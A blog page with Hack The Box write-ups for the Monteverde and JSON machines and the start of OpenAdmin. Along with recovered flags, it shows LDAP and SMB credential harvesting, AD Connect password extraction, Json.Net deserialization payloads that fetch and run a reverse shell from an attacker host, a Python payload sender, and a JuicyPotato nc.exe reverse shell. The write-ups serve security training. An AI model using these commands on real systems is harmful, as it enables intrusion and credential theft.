htb-monteverde-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

I found the users with:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt
Also found the following
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z
 login smb as SABatchJobs:SABatchJobs, and find a xml file in mhope home dir
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs 
Enter WORKGROUP\SABatchJobs's password: SABatchJobs 
Try "help" to get a list of possible commands. smb: > ls . D 0 Fri Jan 3 08:12:48 2020 .. D 0 Fri Jan 3 08:12:48 2020 dgalanos D 0 Fri Jan 3 08:12:30 2020 mhope D 0 Fri Jan 3 08:41:18 2020 roleary D 0 Fri Jan 3 08:10:30 2020 smorgan D 0 Fri Jan 3 08:10:24 2020
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>

Because the file was in the “mhope” users directory, you can guess that this is his password: mhope: 4n0therD4y@n0th3r$

With evil-winrm you can connect to the victim and get the user’s flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

getting Root

If you look at the rights of this user, you can see that he is a member of the Azure Admins group:
Which means he can run a DCSync.

Running the attack is as easy as downloading the PS1 script from:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

more info in:  https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we execute:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the password of the administrator you can log in via winrm and get the root

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

After some failures:

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author : Puckiestyle

htb-json-nl

As always, first an nmap scan

root @ kali: ~ / htb / json # nmap -sV 10.10.10.158
Starting Nmap 7.80 (https://nmap.org) at 2020-01-13 03:59 EST
Nmap scan report for 10.10.10.158
Host is up (0.077s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21 / tcp open ftp FileZilla ftpd
80 / tcp open http Microsoft IIS httpd 8.5
135 / tcp open msrpc Microsoft Windows RPC
139 / tcp open netbios-ssn Microsoft Windows netbios-ssn
445 / tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152 / tcp open msrpc Microsoft Windows RPC
49153 / tcp open msrpc Microsoft Windows RPC
49154 / tcp open msrpc Microsoft Windows RPC
49155 / tcp open msrpc Microsoft Windows RPC
49156 / tcp open msrpc Microsoft Windows RPC
49157 / tcp open msrpc Microsoft Windows RPC
49158 / tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe: / o: microsoft: windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

The initial analysis of the ftp, smb and powershell ports turned out to be not very helpful, so I continued with the web pages.

The web page showed a login screen, but a simple guess with Admin: Admin as username / password combination let me in.

After analyzing all requests in Burpsuite, the request on / api / Account stood out because the name of the box is JSON and this is the only request with a JSON response. I looked closely at the request in Burp and noticed that it had an OAuth2 cookie and a Bearer token, so I kept concentrating on that using Curl.

c: \ PENTEST> curl -XGET http://10.10.10.158/api/Account 
{"Message": "Authorization has been denied for this request."} 
c: \ PENTEST> curl -XGET http://10.10.10.158 / api / Account --header "Cookie: OAuth2 = eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 =" --header "Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 =" 
{ "id": 1, "UserName", "admin", "password", "21232f297a57a5a743894a0e4a801fc3", "Name" : "User Admin HTB", "Role": "Administrator"}

If I repeat the request with Curl, I get a JSON string back with an ID, the username, a password and some other stuff. So let’s take a closer look at that “Bearer string”.

root @ kali: ~ / htb / json # echo -n eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 = | base64 -d 
{"Id": 1, "UserName": "admin", "Password": "21232f297a57a5a743894a0e4a801fc3", "Name": "User Admin HTB", "Role": "Administrator"}

Apparently, the value contains exactly the same that is returned. But what happens if I change the ID value (integer) to a string value.

root@kali:~/htb/json# echo -n {"Id":a,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"} | base64 |tr -d '\n'; echo
SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y

root@kali:~/htb/json# curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y"
{"Message":"An error has occurred.","ExceptionMessage":"Cannot deserialize Json.Net Object","ExceptionType":"System.Exception","StackTrace":null}r

So it gives an error because it cannot deserialize a Json.Net object. After some searching I came across this   document here it is specifically stated that this is not a JSON vulnerability but a Deserialization vulnerability, After looking a bit more, they specifically mention that Json.Net is also vulnerable. Apparently it should be possible to inject code if you have control over the Type value of the Serialized object. I started a python web server to host a custom nishang Powershell script as Ippsec shows in several videos

root@kali:~/JSON# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1
root@kalivm:~/JSON# echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.70 -Port 443" >> puckieshell443.ps1
root@kali:~/JSON# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

After that changed, I started creating the required Json.net payloads, as specifically stated in the Breeze demo of the Blackhat Talk.

see below the rce “proof of concept” with burp and ysoserial.exe and tcpdump

c: \ PENTEST \ ysoserial> ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.16.70" -t
{
'$ type': 'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35',
'MethodName': 'Start',
"MethodParameters": {
'$ type': 'System.Collections.ArrayList, mscorlib, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'$ values': ['cmd', '/ c ping 10.10.16.70']
},
'ObjectInstance': {'$ type': 'System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089'}
}
c: \ PENTEST \ ysoserial>

While I was messing around with this stuff, I got tired of having to encode the payloads base64 and then resend it, so I decided to create a simple python script to do that for me.

root @ kali: ~ / htb / json # cat htb-json.py 
#! / usr / bin / env python3
from base64 import b64decode, b64encode
import requests
import argparse

parser = argparse.ArgumentParser (description = 'pass the attack script.')
parser.add_argument ("- s", '--script', required = True, 
help = 'script to process for the attack')
args = parser.parse_args ()

admin_token = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0 ="
# Base64 encode the provided payload file
def create_payload (package):
payload = open (package, 'rb'). read ()
return b64encode (payload) .decode ('UTF-8')

#Send the payload file
print ("Sending payload:", args.script)
requests.get ('http://10.10.10.158/api/Account', 
headers = {
'Cookie': 'OAuth2 =' + admin_token, 
'Bearer': create_payload (args.script)
})

Quite a bit of a hassle later, I finally got the first load that PowerShell uses to invoke a request to transfer the modified PowerShell Reverse shell.

root@kali:~/htb/json# cat getPS1.plain 
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell Invoke-WebRequest -Uri "http://10.10.16.70:8000/puckieshell443.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}

root@kali:~/htb/json# python3 htb-json.py -s getPS1.plain
Sending payload:  getPS1.plain

And in the python web server shell I see the incoming GET request from the JSON box for the reverse.ps1 file.

root @ kali: ~ / htb # python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.158 - - [13 / Jan / 2020 03:04:51] "GET /puckieshell443.ps1 HTTP / 1.1" 200 -

The next step is to complete the object file that the PowerShell script calls, and after some hassle with that file I came across the following lines of code:

root @ kali: ~ / htb / json # cat execPS1.plain 
{
'$ type': 'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35', 
'MethodName': 'Start',
"MethodParameters": {
'$ type': 'System.Collections.ArrayList, mscorlib, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089',
'$ values': ['cmd', '/ c powershell c: \\ windows \\ temp \\ sedje.ps1']
},
'ObjectInstance': {'$ type': 'System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089'}
}

And in the Terminal while the netcat listener waits for a while, I see …

root @ kali: ~ / htb # rlwrap nc -nvvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49275
Windows PowerShell running as user JSON $ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C: \ windows \ system32 \ inetsrv>

Yes, I have a shell The next thing to do is look who I am and capture the user’s flag!

PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> Get-Content c:\Users\userpool\Desktop\user.txt
34459a01f50050dc410db09bfb9f52bb34459a01

Additional note

I received feedback that the command I used in the payload could have been even simpler. Instead of the ‘cmd’ and ‘/ c’ approvals, the following would have been just as simple.

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell','Invoke-WebRequest -Uri "http://10.10.16.70:8000/reverse.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Privilege Escalation

After poking around and performing general PrivEsc actions, I find an interesting file in a Sync2FTP directory

PS C:\Program Files\Sync2Ftp> type SyncLocation.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="destinationFolder" value="ftp://localhost/"/>
    <add key="sourcefolder" value="C:\inetpub\wwwroot\jsonapp\Files"/>
    <add key="user" value="4as8gqENn26uTs9srvQLyg=="/>
    <add key="minute" value="30"/>
    <add key="password" value="oQ5iORgUrswNRsJKH9VaCw=="></add>
    <add key="SecurityKey" value="_5TL#+GWWFv6pfT3!GXw7D86pkRRTv+$$tk^cL5hdU%"/>
  </appSettings>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>


</configuration>

The file appears to contain a username, password that looks like a base64 string and a security key. Decoding the base64 strings brought me some unreadable stuff so I decided to run the SyncLocation.exe file and it ran without any issues. Since the .exe file is likely to use the .config file, I copy both files to a writable folder so that I can transfer them out of the box for further analysis.

C:\Program Files\Sync2Ftp> mkdir c:\windows\temp\sedje
                                          
                                          
    Directory: C:\windows\temp            
                                          
                                          
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         10/5/2019   9:08 PM            sedje
                                                  
                                                  
PS C:\Program Files\Sync2Ftp> cd c:\windows\temp\sedje
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe" .
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe.config" .

Now that those files are ready, I have to start a local FTP server to catch the files. Python can easily do this using the pyftpdlib library.

root@kalivm:~/JSON# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-05 21:15:22] >>> starting FTP server on 0.0.0.0:21, pid=10105 < <<
[I 2019-10-05 21:15:22] concurrency model: async
[I 2019-10-05 21:15:22] masquerade (NAT) address: None
[I 2019-10-05 21:15:22] passive ports: None

In the Windows box, I create an ftp script and transfer the files to my local computer.

PS C: \ windows \ temp \ sedje> dir
Directory: C: \ windows \ temp \ sedje
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-ar-- 5/23/2019 2:48 PM 9728 SyncLocation.exe 
-a --- 5/23/2019 3:08 PM 591 SyncLocation.exe.config

PS C: \ windows \ temp \ sedje> echo "open 10.10.16.70"> ftp 
PS C: \ windows \ temp \ sedje> echo "anonymous" >> ftp 
PS C: \ windows \ temp \ sedje> echo ""> > ftp 
PS C: \ windows \ temp \ sedje> echo "put SyncLocation.exe" >> ftp 
PS C: \ windows \ temp \ sedje> echo "put SyncLocation.exe.config" >> ftp 
PS C: \ windows \ temp \ sedje> echo "quit" >> ftp 
PS C: \ windows \ temp \ sedje> ftp -s: ftp
ftp> open 10.10.16.70
Connected to 10.10.16.70.
220 pyftpdlib 1.5.4 ready.
User (10.10.16.70:(none)): 
331 Username ok, send password.

230 Login successful.
ftp> put SyncLocation.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 9728 bytes sent in 0.16Seconds 62.36Kbytes / sec.
ftp> put SyncLocation.exe.config
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 591 bytes sent in 0.01Seconds 39.40Kbytes / sec.
ftp> quit
221 Goodbye.
PS C: \ windows \ temp \ sedje>

So the FTP script says the files are being transferred. Time to check the FTP server for the same.

root @ kali: ~ / htb / json # python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-13 05:33:01] >>> starting FTP server on 0.0.0.0:21, pid = 3848 <<<
[I 2020-01-13 05:33:01] concurrency model: async
[I 2020-01-13 05:33:01] masquerade (NAT) address: None
[I 2020-01-13 05:33:01] passive ports: None
[I 2020-01-13 05:35:07] 10.10.10.158:49859- [] FTP session opened (connect)
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] USER 'anonymous' logged in.
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe completed = 1 bytes = 9728 seconds = 0.28
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe.config completed = 1 bytes = 591 seconds = 0.14
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] FTP session closed (disconnect).
^ C [I 2020-01-13 05:37:28] received interrupt signal
[I 2020-01-13 05:37:28] >>> shutting down FTP server (1 active socket fds) <<<
root @ kali: ~ / htb / json # ls
execPS1.plain htb-json nmap-json.gnmap nmap-json.xml SyncLocation.exe.config
getPS1.plain htb-json.py nmap-json.nmap SyncLocation.exe
After the files are transferred, I transfer them to a local Windows VM, because it's easier than analyzing on Linux. I open .exe in dnspy.

In the binary, there is a clearly readable Decrypt () function that needs a key and a value to decode the base64 encoded strings. Since I'm not very good with .net stuff, I look for a simple solution online.

I find that solution in dotnetfiddle, an online tool that can run dotnet code. After modifying the code by adding the key and calling the function twice with the base64 string in it, I get the results.
Username: superadmin
Password: funnyhtb

Now there are still several places where I can try these login details. After some hassle with PowerShell privilege escalation, I got a hint that I should try a different path and try the FTP server.

c:\PENTEST>ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
202 UTF8 mode is always enabled. No need to send this command.
User (10.10.10.158:(none)): superadmin
331 Password required for superadmin
Password:
230 Logged onroot@kalivm:~/~# ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): superadmin
331 Password required for superadmin
Password:
230 Logged on
Remote system type is UNIX.

Bingo! Logged in to the FTP server, all that was left to do is check the desktop for the flag and get it!

ftp> dir Desktop
200 Port command successful
150 Opening data channel for directory listing of "/Desktop"
-r--r--r-- 1 ftp ftp            282 May 22  2019 desktop.ini
-r--r--r-- 1 ftp ftp             32 May 22  2019 root.txt
226 Successfully transferred "/Desktop"
ftp> get Desktop/root.txt ./root.txt
local: ./root.txt remote: Desktop/root.txt
200 Port command successful
150 Opening data channel for file download from server of "/Desktop/root.txt"
226 Successfully transferred "/Desktop/root.txt"
32 bytes received in 0.00 secs (223.2143 kB/s)
ftp> 221 Goodbye
root@kali:~/JSON# cat root.txt
3cc85d1bed2ee84af4074101b991d441

Also the juicypotato way to escalate to root!

When running systeminfo I saw it was a Windows Server 2012 Datacenter, it is most likely vulnerable to JuicyPotato.
So I uploaded the exploit, and searched  http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/ for a CLSID with NT
AUTHORITY \ SYSTEM permission, and run this nc.exe:

PS C: \ windows \ temp \ sedje> whoami / priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State 
============================= ===================== ==================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C: \ windows \ temp \ sedje> certutil -urlcache -split -f http://10.10.16.70/nc.exe C: \ users \ userpool \ Downloads \ nc.exe
**** Online ****
0000 ...
6th
CertUtil: -URLCache command completed successfully.
PS C: \ windows \ temp \ sedje> certutil -urlcache -split -f http://10.10.16.70/juicypotato.exe C: \ users \ userpool \ Downloads \ juicypotato.exe
**** Online ****
000000 ...
054e00
CertUtil: -URLCache command completed successfully.
PS C: \ windows \ temp \ sedje> cd C: \ users \ userpool \ Downloads \ 
PS C: \ users \ userpool \ Downloads> . \ JuicyPotato.exe -l 1337 -pc: \ windows \ system32 \ cmd.exe - a "/ c C: \ users \ userpool \ Downloads \ nc.exe 10.10.16.70 53 -e cmd.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334}; NT AUTHORITY \ SYSTEM

[+] CreateProcessWithTokenW OK
PS C: \ users \ userpool \ Downloads>
root @ kali: ~ / htb # python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.158 - - [13 / Jan / 2020 05:58:01] "GET /nc.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:01] "GET /nc.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:16] "GET /juicypotato.exe HTTP / 1.1" 200 -
10.10.10.158 - - [13 / Jan / 2020 05:58:17] "GET /juicypotato.exe HTTP / 1.1" 200 -
root @ kali: ~ / htb / json # rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49972
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C: \ Windows \ system32> whoami
whoami
nt authority \ system

C: \ Windows \ system32>

files used: https://github.com/puckiestyle/python/blob/master/htb-json.py

https://github.com/puckiestyle/pentest/blob/master/ysoserial.zip

https://github.com/puckiestyle/pentest/blob/master/juicypotato.exe

https://github.com/pwntester/ysoserial.net

root = 3cc85d1bed2ee84af4074101b991d441

Author: Puckiestyle

HTB-OPENADMIN-NL

Zoals altijd beginnen we met een nmap scan

┌─[puck@parrot-lt]─[~/htb/openadmin]
└──╼ $nmap -sC -sV 10.10.10.171 -oN allports.nmap
